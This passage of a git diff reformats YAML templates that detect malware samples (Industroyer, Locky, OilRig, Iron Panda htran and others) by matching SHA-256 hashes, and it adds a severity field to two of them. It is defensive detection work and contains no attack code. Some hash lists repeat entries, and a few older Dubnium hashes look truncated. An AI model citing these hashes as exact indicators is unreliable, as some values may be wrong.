'a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827'" + - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" + - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" + - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" + - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" + - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" + - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" + - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" + - "sha256(raw) == '839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba'" + - "sha256(raw) == '16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" + - "sha256(raw) == '1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" + - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" + - "sha256(raw) == '5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b'" + - "sha256(raw) == '5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0'" + - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" + - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" + - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" + condition: or diff --git a/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml b/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml index 46a7dcfde6..879d378ea6 100644 --- a/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml +++ b/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml @@ -2,6 +2,7 @@ id: dubnium-sshopenssl-malware-hash info: name: Dubnium Sample SSHOpenSSL Hash - Detect author: pussycat0x + severity: info description: | Detects sample mentioned in the Dubnium Report reference: @@ -13,13 +14,13 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" - - "sha256(raw) == 'feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" - - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" - - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" - - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" - - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b'" + - "sha256(raw) == 'feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8'" + - "sha256(raw) == '41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf'" + - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" + - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" + - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" + condition: or diff --git a/file/malware/hash/emissary-malware-hash.yaml b/file/malware/hash/emissary-malware-hash.yaml index 49a012292b..96d7fbea35 100644 --- a/file/malware/hash/emissary-malware-hash.yaml +++ b/file/malware/hash/emissary-malware-hash.yaml @@ -2,6 +2,7 @@ id: emissary-malware-hash info: name: Emissary APT Malware Hash - Detect author: pussycat0x + severity: info description: | Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll reference: @@ -13,20 +14,20 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab'" - - "sha256(raw) == '70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629'" - - "sha256(raw) == '0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290'" - - "sha256(raw) == '69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664'" - - "sha256(raw) == '675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc'" - - "sha256(raw) == 'e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b'" - - "sha256(raw) == 'a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8'" - - "sha256(raw) == 'acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9'" - - "sha256(raw) == 'e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d'" - - "sha256(raw) == 'e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538'" - - "sha256(raw) == '29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051'" - - "sha256(raw) == '98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0'" - - "sha256(raw) == 'fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab'" + - "sha256(raw) == '70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629'" + - "sha256(raw) == '0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290'" + - "sha256(raw) == '69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664'" + - "sha256(raw) == '675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc'" + - "sha256(raw) == 'e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b'" + - "sha256(raw) == 'a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8'" + - "sha256(raw) == 'acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9'" + - "sha256(raw) == 'e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d'" + - "sha256(raw) == 'e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538'" + - "sha256(raw) == '29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051'" + - "sha256(raw) == '98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0'" + - "sha256(raw) == 'fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/fakem-malware-hash.yaml b/file/malware/hash/fakem-malware-hash.yaml index 85f755b7af..2935d5bbe1 100644 --- a/file/malware/hash/fakem-malware-hash.yaml +++ b/file/malware/hash/fakem-malware-hash.yaml @@ -14,18 +14,18 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3'" - - "sha256(raw) == '3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520'" - - "sha256(raw) == '53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60'" - - "sha256(raw) == '4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3'" - - "sha256(raw) == '7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8'" - - "sha256(raw) == '12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d'" - - "sha256(raw) == '9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5'" - - "sha256(raw) == '3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90'" - - "sha256(raw) == '41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33'" - - "sha256(raw) == '53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e'" - - "sha256(raw) == '523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '631fc66e57acd52284aba2608e6f31ba19e2807367e33d8704f572f6af6bd9c3'" + - "sha256(raw) == '3d9bd26f5bd5401efa17690357f40054a3d7b438ce8c91367dbf469f0d9bd520'" + - "sha256(raw) == '53af257a42a8f182e97dcbb8d22227c27d654bea756d7f34a80cc7982b70aa60'" + - "sha256(raw) == '4a4dfffae6fc8be77ac9b2c67da547f0d57ffae59e0687a356f5105fdddc88a3'" + - "sha256(raw) == '7bfbf49aa71b8235a16792ef721b7e4195df11cb75371f651595b37690d108c8'" + - "sha256(raw) == '12dedcdda853da9846014186e6b4a5d6a82ba0cf61d7fa4cbe444a010f682b5d'" + - "sha256(raw) == '9adda3d95535c6cf83a1ba08fe83f718f5c722e06d0caff8eab4a564185971c5'" + - "sha256(raw) == '3209ab95ca7ee7d8c0140f95bdb61a37d69810a7a23d90d63ecc69cc8c51db90'" + - "sha256(raw) == '41948c73b776b673f954f497e09cc469d55f27e7b6e19acb41b77f7e64c50a33'" + - "sha256(raw) == '53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e'" + - "sha256(raw) == '523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b'" + condition: or diff --git a/file/malware/hash/furtim-malware-hash.yaml b/file/malware/hash/furtim-malware-hash.yaml index 599006f431..04c67fca6a 100644 --- a/file/malware/hash/furtim-malware-hash.yaml +++ b/file/malware/hash/furtim-malware-hash.yaml @@ -14,9 +14,9 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963'" - - "sha256(raw) == '4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '766e49811c0bb7cce217e72e73a6aa866c15de0ba11d7dda3bd7e9ec33ed6963'" + - "sha256(raw) == '4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948'" + condition: or diff --git a/file/malware/hash/greenbug-malware-hash.yaml b/file/malware/hash/greenbug-malware-hash.yaml index 292f206408..de608feb9b 100644 --- a/file/malware/hash/greenbug-malware-hash.yaml +++ b/file/malware/hash/greenbug-malware-hash.yaml @@ -14,19 +14,19 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76'" - - "sha256(raw) == '6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d'" - - "sha256(raw) == '21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685'" - - "sha256(raw) == '319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6'" - - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" - - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" - - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" - - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" - - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" - - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" - - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" - - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" - condition: or \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'dab460a0b73e79299fbff2fa301420c1d97a36da7426acc0e903c70495db2b76'" + - "sha256(raw) == '6b28a43eda5b6f828a65574e3f08a6d00e0acf84cbb94aac5cec5cd448a4649d'" + - "sha256(raw) == '21f5e60e9df6642dbbceca623ad59ad1778ea506b7932d75ea8db02230ce3685'" + - "sha256(raw) == '319a001d09ee9d754e8789116bbb21a3c624c999dae9cf83fde90a3fbe67ee6'" + - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" + - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" + - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" + - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" + - "sha256(raw) == '308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f'" + - "sha256(raw) == '44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49'" + - "sha256(raw) == '7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c'" + - "sha256(raw) == '82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9'" + condition: or \ No newline at end of file diff --git a/file/malware/hash/industroyer-malware-hash.yaml b/file/malware/hash/industroyer-malware-hash.yaml index c66c5d3756..c1798d81c4 100644 --- a/file/malware/hash/industroyer-malware-hash.yaml +++ b/file/malware/hash/industroyer-malware-hash.yaml @@ -13,16 +13,16 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910'" - - "sha256(raw) == '018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81'" - - "sha256(raw) == '3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571'" - - "sha256(raw) == '37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4'" - - "sha256(raw) == 'ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77'" - - "sha256(raw) == '6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47'" - - "sha256(raw) == '893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f'" - - "sha256(raw) == '21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561'" - - "sha256(raw) == '7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910'" + - "sha256(raw) == '018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81'" + - "sha256(raw) == '3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571'" + - "sha256(raw) == '37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4'" + - "sha256(raw) == 'ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77'" + - "sha256(raw) == '6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47'" + - "sha256(raw) == '893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f'" + - "sha256(raw) == '21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561'" + - "sha256(raw) == '7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad'" + condition: or diff --git a/file/malware/hash/ironPanda-htran-malware-hash.yaml b/file/malware/hash/ironPanda-htran-malware-hash.yaml index be3cbf2f79..b8cc9c0d46 100644 --- a/file/malware/hash/ironPanda-htran-malware-hash.yaml +++ b/file/malware/hash/ironPanda-htran-malware-hash.yaml @@ -14,7 +14,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7'" \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7'" \ No newline at end of file diff --git a/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml index cf23adaea5..3bacd1aef4 100644 --- a/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml +++ b/file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml @@ -14,7 +14,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431'" \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431'" \ No newline at end of file diff --git a/file/malware/hash/ironpanda-malware-hash.yaml b/file/malware/hash/ironpanda-malware-hash.yaml index 2cd5242c76..dba97a70dd 100644 --- a/file/malware/hash/ironpanda-malware-hash.yaml +++ b/file/malware/hash/ironpanda-malware-hash.yaml @@ -12,11 +12,11 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a'" - - "sha256(raw) == 'a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91'" - - "sha256(raw) == '5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742'" - - "sha256(raw) == '0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a'" + - "sha256(raw) == 'a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91'" + - "sha256(raw) == '5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742'" + - "sha256(raw) == '0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c'" + condition: or diff --git a/file/malware/hash/locky-ransomware-hash.yaml b/file/malware/hash/locky-ransomware-hash.yaml index bd15b7ff67..8092b89a1d 100644 --- a/file/malware/hash/locky-ransomware-hash.yaml +++ b/file/malware/hash/locky-ransomware-hash.yaml @@ -14,7 +14,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8'" \ No newline at end of file + matchers: + - type: dsl + dsl: + - "sha256(raw) == '5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8'" \ No newline at end of file diff --git a/file/malware/hash/minidionis-readerview-malware-hash.yaml b/file/malware/hash/minidionis-readerview-malware-hash.yaml index 49d3c5925f..ff0bf7ff66 100644 --- a/file/malware/hash/minidionis-readerview-malware-hash.yaml +++ b/file/malware/hash/minidionis-readerview-malware-hash.yaml @@ -14,13 +14,13 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" - - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" - - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" - - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" - - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" - - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" + - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" + - "sha256(raw) == '88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f'" + - "sha256(raw) == '97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7'" + - "sha256(raw) == 'ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46'" + - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" + condition: or diff --git a/file/malware/hash/minidionis-vbs-malware-hash.yaml b/file/malware/hash/minidionis-vbs-malware-hash.yaml index 1c4a0c6d05..73d5179ee0 100644 --- a/file/malware/hash/minidionis-vbs-malware-hash.yaml +++ b/file/malware/hash/minidionis-vbs-malware-hash.yaml @@ -13,7 +13,7 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646'" + matchers: + - type: dsl + dsl: + - "sha256(raw) == '97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646'" diff --git a/file/malware/hash/naikon-apt-malware-hash.yaml b/file/malware/hash/naikon-apt-malware-hash.yaml index ddb8f9177a..c4fc21e7ab 100644 --- a/file/malware/hash/naikon-apt-malware-hash.yaml +++ b/file/malware/hash/naikon-apt-malware-hash.yaml @@ -11,9 +11,9 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'd5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba'" - - "sha256(raw) == 'f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'd5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba'" + - "sha256(raw) == 'f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96'" + condition: or diff --git a/file/malware/hash/neuron2-malware-hash.yaml b/file/malware/hash/neuron2-malware-hash.yaml index bed555af53..3af07aaeb5 100644 --- a/file/malware/hash/neuron2-malware-hash.yaml +++ b/file/malware/hash/neuron2-malware-hash.yaml @@ -12,9 +12,9 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == '51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927'" - - "sha256(raw) == '83d8922e7a8212f1a2a9015973e668d7999b90e7000c31f57be83803747df015'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == '51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927'" + - "sha256(raw) == '83d8922e7a8212f1a2a9015973e668d7999b90e7000c31f57be83803747df015'" + condition: or diff --git a/file/malware/hash/oilrig-malware-hash.yaml b/file/malware/hash/oilrig-malware-hash.yaml index cbd6353198..3317cdbd78 100644 --- a/file/malware/hash/oilrig-malware-hash.yaml +++ b/file/malware/hash/oilrig-malware-hash.yaml @@ -14,32 +14,32 @@ file: - extensions: - all - matchers: - - type: dsl - dsl: - - "sha256(raw) == 'd808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34'" - - "sha256(raw) == '80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e'" - - "sha256(raw) == '662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f'" - - "sha256(raw) == '903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996'" - - "sha256(raw) == 'c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da'" - - "sha256(raw) == '57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4'" - - "sha256(raw) == '1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1'" - - "sha256(raw) == '9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777'" - - "sha256(raw) == '0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e'" - - "sha256(raw) == '4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281'" - - "sha256(raw) == '4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353'" - - "sha256(raw) == 'c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51'" - - "sha256(raw) == 'f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2'" - - "sha256(raw) == '0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39'" - - "sha256(raw) == 'd874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d'" - - "sha256(raw) == '8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9'" - - "sha256(raw) == '55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579'" - - "sha256(raw) == '528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b'" - - "sha256(raw) == '93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0'" - - "sha256(raw) == 'e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa'" - - "sha256(raw) == '9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471'" - - "sha256(raw) == 'a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064'" - - "sha256(raw) == '3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff'" - - "sha256(raw) == '3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4'" - - "sha256(raw) == 'f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e'" - condition: or + matchers: + - type: dsl + dsl: + - "sha256(raw) == 'd808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34'" + - "sha256(raw) == '80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e'" + - "sha256(raw) == '662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f'" + - "sha256(raw) == '903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996'" + - "sha256(raw) == 'c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da'" + - "sha256(raw) == '57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4'" + - "sha256(raw) == '1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1'" + - "sha256(raw) == '9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777'" + - "sha256(raw) == '0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e'" + - "sha256(raw) == '4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281'" + - "sha256(raw) == '4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353'" + - "sha256(raw) == 'c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51'" + - "sha256(raw) == 'f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2'" + - "sha256(raw) == '0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39'" + - "sha256(raw) == 'd874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d'" + - "sha256(raw) == '8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9'" + - "sha256(raw) == '55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579'" + - "sha256(raw) == '528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b'" + - "sha256(raw) == '93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0'" + - "sha256(raw) == 'e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa'" + - "sha256(raw) == 